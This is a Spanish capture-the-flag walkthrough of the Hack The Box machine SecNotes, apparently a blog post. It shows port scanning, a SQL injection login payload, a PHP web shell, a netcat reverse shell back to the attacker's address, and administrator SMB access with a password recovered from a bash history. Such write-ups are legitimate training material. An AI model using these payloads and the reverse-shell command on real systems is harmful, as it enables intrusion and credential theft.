nmap -sV -sC 10.10.10.97Tenemos el puerto 80, 445, empece haciendo una búsqueda de directorios no tuve mucho dato. Ahora empecemos a ver como se ve en el navegador y nos muestra un login y un register.
Me hizo recordar a un desafio de seguridad que cree para ekoparty y como creador de ese desafio intente romperlo con el mismo método. HERE Me fui a register y comence a registrar el usuario y contraseña con los siguiente:
' or 1=1#Ahora mismo nos logueamos con lo mismo que registramos y obtenemos la siguiente informacion.
Ahora tenemos la credenciales para samba del puerto 445 pero vemos "secnotes.htb" y tenemos que modificar
nano /etc/hosts
10.10.10.97 secnotes.htb secnotesY ahora podemos usar smbclient o el mismo directorio de gnome de kali linux.
Luego subimos una shell pero antes de hacerlo se nos olvido un puerto.
nmap -sV -sC -p- 10.10.10.97Y tenemos un puerto 8808 en el cual podemos ejecutar nuestra shell. HERE
Ahora vamos a ver nuestro navegador
http://10.10.10.97:8808/creadshell.php?cmd=whoamiRecuerda que el servidor tiene un nc y podemos hacer un netcat.
http://10.10.10.97:8808/creadshell.php?cmd=netcat.exe%2010.10.13.155%206969%20-e%20cmd.exe
nc -lvp 6969Ahora encontramos el user y necesitamos acceder al administrador.
Ahora podemos buscar un "bash.exe" en el cual vamos a ver el historial para encontrar la contraseña que se uso smbclient.
bash -c "uname -a"
bash -c "cat /root/.bash_history"
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$Pero lo usamos con la IP
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$Por estar conectado en smbclient no podemos usar get, entonces lo podemos descargar
get \Users\Administrator\Desktop\root.txt
1 Comments
m3c0
ReplyDelete